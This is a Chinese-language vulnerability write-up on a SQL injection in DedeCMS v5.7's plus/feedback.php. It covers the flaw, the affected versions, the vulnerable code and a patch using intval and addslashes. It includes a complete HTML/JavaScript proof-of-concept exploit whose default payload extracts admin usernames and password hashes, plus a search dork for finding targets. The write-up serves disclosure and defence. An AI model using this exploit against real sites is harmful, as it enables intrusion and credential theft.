catalog

1. 漏洞描述 2. 漏洞觸發條件 3. 漏洞影響范圍 4. 漏洞代碼分析 5. 防御方法 6. 攻防思考

?

1. 漏洞描述

1. Dedecms v5.7的plus\feedback.php SQL沒有正確驗證用戶提供的輸入，在實現上中存在注入漏洞 2. 攻擊者可以利用DEDECMS的變量覆蓋漏洞向數據庫中注入WEBSHELL Payload 3. 在另一個代碼流，攻擊者可以觸發二次注入

Relevant Link:

http://sebug.net/vuldb/ssvid-60549 http://www.venustech.com.cn/NewsInfo/124/17697.Html http://www.sorry404.com/chengxuwenti/20140504/47.html

2. 漏洞觸發條件

0x1: POC

<html> <head> <title>DedeCms v5.7 feedback.php exp</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <script language='javascript'> y = document.form1.addr.value; function exploit() { var yanzhen = document.getElementById("yanzhen").value;var aid = document.getElementById("aid").value;var sqli = document.getElementById("sqli").value;document.form1.typeid.value = "0','3','4','5','0','1351739660', '0','0','0','0','0','aaaaaa'), ('" + aid +"','2',@`'`,'4','5','1','1351739660', '0','0','0','0','0',"+sqli+")#";document.form1.action = document.form1.addr.value + "/plus/feedback.php";document.form1.te.name = "action";document.form1.submit(); } function getyanzhen() {var x = "<img src='"+ document.form1.addr.value +"/include/vdimgck.php' width='60' height='24' οnclick=\"this.src=this.src+'?'\">";document.body.innerHTML+=x;document.form1.addr.value = y; } function look() {window.location.href = document.form1.addr.value+"/plus/feedback.php?aid="+document.getElementById("aid").value; } </script> </head> <body> ############################################################<br/> DedeCms v5.7 feedback.php $typeid SQLi<br/> Dork:inurl:plus/feedback.php?aid=<br/> ############################################################<br/><br/> <form action="xxx" method="get" name="form1" target="_blank"> 程序URL:<input type="text" id="addr" value="http://" /><br/> 驗證碼:<input type="text" name="validate" id="yanzhen" value=""/><br/> 存在的Aid:<input type="text" id="aid" value="1"/><br/> SQL注入語句:<input type="text" id="sqli" value="(SELECT concat(uname,0x5f,pwd,0x5f) FROM `dede_admin`)" style="width:500px;"/><br/> <input type="hidden" name="" id="te" value="send"/> <input type="hidden" name="comtype" value="comments"/> <input type="hidden" name="fid" value="1"/> <input type="hidden" name="isconfirm" value="yes"/> <input type="hidden" name="msg" value="90sec"/> <input type="hidden" name="typeid" value=""/> <input type="button" οnclick="getyanzhen();" value="獲取驗證碼"> <input type="button" onClick="exploit()" value="#Exploit#" /> <input type="button" onClick="look()" value="查看結果" /><br/> </form> </body> </html>

Relevant Link:

http://www.oday.pw/WEBanquan/111312.html

3. 漏洞影響范圍

<= dedecms 5.7

4. 漏洞代碼分析

\plus\feedback.php

.. //保存評論內容 if($comtype == 'comments') {$arctitle = addslashes($title);if($msg!=''){//$typeid變量未做初始化$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";$rs = $dsql->ExecuteNoneQuery($inquery);if(!$rs){ShowMsg(' 發表評論錯誤! ', '-1');//echo $dsql->GetError(); exit();}} } //引用回復 elseif ($comtype == 'reply') {$row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");//未對數據庫查詢的$row['arctitle']進行有效過濾，造成二次注入$arctitle = $row['arctitle'];$aid =$row['aid'];$msg = $quotemsg.$msg;$msg = HtmlReplace($msg,2);$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";$dsql->ExecuteNoneQuery($inquery); } ..

Relevant Link:

http://www.yunsec.net/a/security/web/jbst/2012/1103/11816.html

5. 防御方法

\plus\feedback.php

//保存評論內容if($comtype == 'comments'){ $arctitle = addslashes($title);/* 增加規范化、過濾邏輯 */$typeid = intval($typeid);$ischeck = intval($ischeck);$feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype);/**/if($msg!=''){//$typeid變量未做初始化$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";$rs = $dsql->ExecuteNoneQuery($inquery);if(!$rs){ShowMsg(' 發表評論錯誤! ', '-1');//echo $dsql->GetError(); exit();}}}//引用回復elseif ($comtype == 'reply'){$row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");//未對數據庫查詢的$row['arctitle']進行有效過濾，造成二次注入$arctitle = $row['arctitle'];/* 增加轉義邏輯 */$arctitle = addslashes($row['arctitle']);/* */$aid =$row['aid'];$msg = $quotemsg.$msg;$msg = HtmlReplace($msg,2);$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";$dsql->ExecuteNoneQuery($inquery);}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

?

轉載于:https://www.cnblogs.com/LittleHann/p/4507729.html

總結

以上是生活随笔為你收集整理的dedecms /plus/feedback.php SQL Injection Vul的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。